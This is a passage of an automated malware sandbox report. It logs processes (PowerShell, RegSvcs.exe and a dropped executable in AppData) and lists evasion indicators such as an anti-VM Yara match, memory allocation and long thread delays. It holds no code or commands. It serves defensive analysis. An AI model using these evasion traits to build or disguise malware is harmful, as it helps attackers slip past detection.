              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3752, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: aVmZDnwW.exe PID: 7328, type: MEMORYSTR
              Source: C:\Users\user\Desktop\file.exeMemory allocated: 27C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory allocated: 29C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory allocated: 27E0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory allocated: 5000000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory allocated: 6000000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory allocated: 6130000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory allocated: 7130000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory allocated: A470000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory allocated: B470000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory allocated: B900000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory allocated: C900000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeMemory allocated: DE0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeMemory allocated: 28B0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeMemory allocated: 48B0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeMemory allocated: 4EE0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeMemory allocated: 5EE0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeMemory allocated: 6010000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeMemory allocated: 7010000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeMemory allocated: 9DC0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeMemory allocated: ADC0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeMemory allocated: B250000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599757Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599546Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599437Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599218Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598671Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598343Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598124Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598015Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597906Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597796Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597672Jump to behavior
